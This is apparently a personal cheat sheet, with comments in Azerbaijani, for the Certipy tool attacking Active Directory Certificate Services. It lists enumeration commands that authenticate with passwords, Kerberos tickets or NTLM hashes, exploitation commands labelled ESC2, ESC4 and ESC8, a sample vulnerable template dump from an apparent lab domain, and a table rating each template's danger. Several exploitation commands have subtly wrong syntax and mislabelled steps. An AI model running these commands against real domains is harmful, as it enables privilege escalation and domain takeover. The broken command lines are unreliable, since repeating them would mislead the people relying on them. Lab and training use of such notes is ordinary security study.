
# Domain admin və ya CA oxuma icazəsi olan hesabla
certipy-ad find -u 'username@domain' -p 'Password123' -dc-ip 10.10.10.10
certipy-ad find -u 'username@domain' -p 'Summer20!!' -dc-ip 10.11.1.10 -stdout

# Kerberos ticket ilə (TGT lazımdır)
certipy-ad find -dc-ip 10.10.10.10 -k

# NTLM hash ilə
certipy-ad find -u 'username@domain' -hashes ':a1b2c3d4e5f6...' -dc-ip 10.10.10.10

=======================================================================================================================================================================

# Yalnız aktiv şablonlar
certipy-ad find -enabled -u 'username@domain' -p 'pass' -dc-ip 10.10.10.10

# Yalnız zəif şablonlar (ESC1, ESC2, ESC4 yolları)
certipy-ad find -vulnerable -u 'username@domain' -p 'pass' -dc-ip 10.10.10.10
certipy-ad find -vulnerable -enabled -u 'username@domain' -p 'Summer20!!' -dc-ip 10.11.1.10

# DC-dən yalnız məlumat (Web Enrollment yox)
certipy-ad find -dc-only -u 'username@domain' -p 'pass' -dc-ip 10.10.10.10

# OID-lərlə detallı məlumat
certipy-ad find -oids -u 'username@domain' -p 'pass' -dc-ip 10.10.10.10

=======================================================================================================================================================================

# ESC2 üçün relay/exploitation
certipy-ad relay -u 'username@domain' -p 'Summer20!!' 

# ESC4 üçün şablon düzəltmə
certipy-ad auth -u 'username@domain' -p 'newpass' -template VulnerableTemplate

# ESC8 üçün DA autentifikasiyası
certipy-ad auth -pfx ./user.pfx -username username@domain

=======================================================================================================================================================================

Template Name                       : User ===================================== Çox vacib
    Display Name                        : User
    Certificate Authorities             : inlanefreight-CA01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectAltRequireEmail
                                          SubjectRequireEmail
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-28T17:11:06+00:00
    Template Last Modified              : 2025-04-28T17:11:06+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : INLANEFREIGHT.LOCAL\Domain Admins
                                          INLANEFREIGHT.LOCAL\Domain Users
                                          INLANEFREIGHT.LOCAL\Enterprise Admins
      Object Control Permissions
        Owner                           : INLANEFREIGHT.LOCAL\Enterprise Admins
        Full Control Principals         : INLANEFREIGHT.LOCAL\Domain Admins
                                          INLANEFREIGHT.LOCAL\Enterprise Admins
        Write Owner Principals          : INLANEFREIGHT.LOCAL\Domain Admins
                                          INLANEFREIGHT.LOCAL\Enterprise Admins
        Write Dacl Principals           : INLANEFREIGHT.LOCAL\Domain Admins
                                          INLANEFREIGHT.LOCAL\Enterprise Admins
        Write Property Enroll           : INLANEFREIGHT.LOCAL\Domain Admins
                                          INLANEFREIGHT.LOCAL\Domain Users
                                          INLANEFREIGHT.LOCAL\Enterprise Admins


| Template             | Real həyatda | Təhlükə |
| -------------------- | ------------ | ------- |
| **User**             | 10/10        | 🔥🔥🔥 |
| **Machine**          | 9/10         | 🔥🔥    |
| **DomainController** | 9/10         | 🔥🔥    |
| **Custom WebServer** | 8/10         | 🔥🔥🔥  |
| **SubCA**            | 3/10         | ☠️      |
| **Enrollment Agent** | 4/10         | ☠️      |
